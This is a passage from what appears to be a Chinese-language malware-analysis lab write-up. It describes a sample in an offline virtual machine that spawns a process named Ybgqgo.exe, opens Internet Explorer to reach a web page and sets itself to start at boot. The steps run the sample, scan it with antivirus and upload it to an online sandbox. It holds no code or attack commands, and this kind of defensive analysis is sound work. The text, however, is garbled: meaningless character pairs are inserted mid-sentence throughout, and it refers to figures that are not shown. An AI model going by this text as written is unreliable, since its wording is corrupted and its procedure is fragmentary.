一會(huì)之后程序另起了一個(gè)進(jìn)程名稱變成了Ybgqgo.exe痢法,進(jìn)程id也變了
過了一段時(shí)間后Ybgqgo.exe停止了自身進(jìn)程,并且啟動(dòng)了ie游覽器窝趣,嘗試訪問特定網(wǎng)頁疯暑。
由于是虛擬機(jī)是斷網(wǎng)環(huán)境,所以沒有進(jìn)一步的過程了哑舒。
4妇拯、直接雙擊運(yùn)行病毒。
5洗鸵、啟動(dòng)殺毒軟件越锈。如下圖所示:
進(jìn)行病毒查殺”毂酰可以看到病毒設(shè)置了開機(jī)的自動(dòng)啟動(dòng)甘凭,并且使用游覽器去訪問網(wǎng)頁。6火邓、打開游覽器訪問https://s.threatbook.cn/丹弱,將病毒文件上傳,觀察生成的報(bào)告铲咨。如下圖所示: